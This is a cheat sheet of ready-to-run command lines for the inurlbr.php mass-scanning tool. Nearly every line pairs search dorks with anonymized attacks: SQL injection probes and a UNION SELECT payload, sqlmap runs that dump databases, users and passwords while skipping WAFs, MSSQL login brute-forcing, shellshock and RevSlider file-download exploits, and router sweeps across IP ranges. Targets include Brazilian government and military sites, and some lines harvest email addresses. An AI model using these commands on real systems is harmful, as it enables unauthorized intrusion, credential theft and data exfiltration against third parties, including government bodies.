Inurlbr.php cheatsheet

inurlbr.php –dork ‘inurl:product.php?Pid= site:.br -google -exploit -dork’ -s 20173010_save.txt -q 1,2,3,4,5,6,9,22 -t 10 –exploit-get “?´’%270×27;” –tor-random –command-vul “proxychains sqlmap -u ‘_TARGETFULL_’–threads 10 –random-agent –dbms mysql –skip-waf –batch –dbs –tables –users –passwords”

inurlbr.php –dork ‘inurl:/wp-content/ site:.AU’ -s save.txt -q 1,6,2,4 -t 3 –random-tor –command “proxychains wpscan -u _TARGET_ –users”

inurlbr.php –dork ‘inurl:admin-ajax.php?action=revslider_show_image -intext:”revslider_show_image”‘ -s vull.txt -q 1,6 –command-all ‘php inurl_revslider.php -t _TARGET_’ –tor-random

inurlbr.php –tor-random –dork ‘inurl:aspx?id=’ -s save.txt -q 1,6 -t 1 –exploit-get “?´’%270×27;”inurlbr.php –tor-random –dork ‘site:br inurl:aspx (id|new)’ -s save.txt -q 1,6 -t 1 –exploit-get “?´’%270×27;”

inurlbr.php –tor-random –dork ‘index of wp-content/uploads’ -s save.txt -q 1,6,2,4 -t 2 –exploit-get ‘?’ -a ‘Index of /wp-content/uploads’

inurlbr.php –tor-random –dork ‘site:.mil.br intext:(confidencial) ext:pdf’ -s save.txt -q 1,6 -t 2 –exploit-get ‘?’ -a ‘confidencial’

inurlbr.php –tor-random –dork ‘site:.mil.br intext:(secreto) ext:pdf’ -s save.txt -q 1,6 -t 2 –exploit-get ‘?’ -a ‘secreto’

inurlbr.php –tor-random –dork ‘site:br inurl:aspx (id|new)’ -s save.txt -q 1,6 -t 1 –exploit-get “?´’%270×27;”

inurlbr.php –tor-random –dork ‘.new.php?new id’ -s save.txt -q 1,6,7,2,3 -t 1 –exploit-get ‘+UNION+ALL+SELECT+1,concat(0x3A3A4558504C4F49542D5355434553533A3A,@@version),3,4,5;’ -a ‘::EXPLOIT-SUCESS::’

inurlbr.php –tor-random –dork ‘new.php?id=’ -s teste.txt  –exploit-get ?´0x27  –command-vul ‘nmap sV -p 22,80,21 _TARGET_’

inurlbr.php –tor-random –dork ‘site:pt inurl:aspx (id|q)’ -s bruteforce.txt –exploit-get ?´0x27 –command-vul ‘msfcli auxiliary/scanner/mssql/mssql_login RHOST=_TARGETIP_ MSSQL_USER=inurlbr MSSQL_PASS_FILE=/home/pedr0/Documentos/passwords E’

inurlbr.php –tor-random –dork ‘site:br inurl:id & inurl:php’ -s get.txt –exploit-get “?´’%270×27;” –command-vul ‘python ../sqlmap/sqlmap.py -u “_TARGETFULL_” –dbs’

inurlbr.php –tor-random –dork ‘inurl:index.php?id=’ -q 1,2,10 –exploit-get “‘?´0x27′” -s report.txt –command-vul ‘nmap -Pn -p 1-8080 –script http-enum –open _TARGET_’

inurlbr.php –tor-random –dork ‘site:.gov.br email’ -s reg.txt -q 1  –regexp ‘([\w\d\.\-\_]+)@([\w\d\.\_\-]+)’

inurlbr.php –tor-random –dork ‘site:.gov.br email (gmail|yahoo|hotmail) ext:txt’ -s emails.txt -m

inurlbr.php –tor-random –dork ‘site:.gov.br email (gmail|yahoo|hotmail) ext:txt’ -s urls.txt -u

inurlbr.php –tor-random –dork ‘site:gov.bo’ -s govs.txt –exploit-all-id  1,2,6

inurlbr.php –tor-random –dork ‘site:.uk’ -s uk.txt –user-agent  ‘Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)’

inurlbr.php –tor-random –dork-file ‘dorksSqli.txt’ -s govs.txt –exploit-all-id  1,2,6

inurlbr.php –tor-random –dork-file ‘dorksSqli.txt’ -s sqli.txt –exploit-all-id  1,2,6  –irc ‘irc.rizon.net#inurlbrasil’

inurlbr.php –tor-random –dork ‘inurl:”cgi-bin/login.cgi”‘ -s cgi.txt –ifurl ‘cgi’ –command-all ‘php xplCGI.php _TARGET_’

inurlbr.php –tor-random –target ‘http://target.com.br’ -o cancat_file_urls_find.txt -s output.txt -t 4

inurlbr.php –tor-random –target ‘http://target.com.br’ -o cancat_file_urls_find.txt -s output.txt -t 4 –exploit-get “?´’%270×27;”

inurlbr.php –tor-random –target ‘http://target.com.br’ -o cancat_file_urls_find.txt -s output.txt -t 4 –exploit-get “?pass=1234” -a ‘hello! admin’

inurlbr.php –tor-random –target ‘http://target.com.br’ -o cancat_file_urls_find_valid_cod-200.txt -s output.txt -t 5

inurlbr.php –tor-random –range ‘200.20.10.1,200.20.10.255’ -s output.txt –command-all ‘php roteador.php _TARGETIP_’

inurlbr.php –tor-random –range-rad ‘1500’ -s output.txt –command-all ‘php roteador.php _TARGETIP_’

inurlbr.php –tor-random –dork-rad ’20’ -s output.txt –exploit-get “?´’%270×27;” -q 1,2,6,4,5,9,7,8

inurlbr.php –tor-random –dork-rad ’20’ -s output.txt –exploit-get “?´’%270×27;” -q 1,2,6,4,5,9,7,8   –pr

inurlbr.php –tor-random –dork-file ‘dorksCGI.txt’ -s output.txt -q 1,2,6,4,5,9,7,8   –pr –shellshock

inurlbr.php –tor-random –dork-file ‘dorks_Wordpress_revslider.txt’ -s output.txt -q 1,2,6,4,5,9,7,8  –sub-file ‘xpls_Arbitrary_File_Download.txt’